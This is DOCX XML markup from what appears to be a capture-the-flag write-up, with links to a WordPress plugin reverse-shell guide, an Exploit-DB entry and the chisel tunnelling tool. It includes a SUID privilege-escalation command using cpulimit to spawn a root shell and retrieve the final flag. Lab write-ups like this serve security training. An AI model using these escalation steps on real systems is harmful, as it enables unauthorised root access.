            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gtfobins.github.io/gtfobins/cpulimit/#suid</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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escalate privileges by executing:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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cpulimit -l 100 -i -- /bin/bash -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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30400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="80" name="image40.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image40.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>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gaining elevated privileges, we access the root user’s directory and retrieve the final flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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01700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="70"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headerReference r:id="rId52" w:type="default"/>
      <w:headerReference r:id="rId53" w:type="first"/>
      <w:headerReference r:id="rId54" w:type="even"/>
      <w:footerReference r:id="rId55" w:type="default"/>
      <w:footerReference r:id="rId56" w:type="first"/>
      <w:footerReference r:id="rId57"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E">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="6"/>
    <w:bookmarkEnd w:id="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91" name="image30.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image30.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6F">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70">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3" name="image9.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image9.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Potoub</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42.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image42.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1.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/48980" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId45"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image" Target="media/image27.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/cpulimit/#sui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6.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.potoub.hackingclub/wp-admin" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sevenlayers.com/index.php/179-wordpress-plugin-reverse-shell" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><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20.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.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0.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4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Ohc4HV/YEZpQqbK/rPLaIeAfag==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLm9jN2FyYnoxczFpZzIOaC5qcDZmdDUxeTZjdGsyDmguMTc1ZjVjczk0ejBvOAByITF4UllkNEo5c2hWeHBEdkt5bGNzWlFMVW50OWNZSHJvNg==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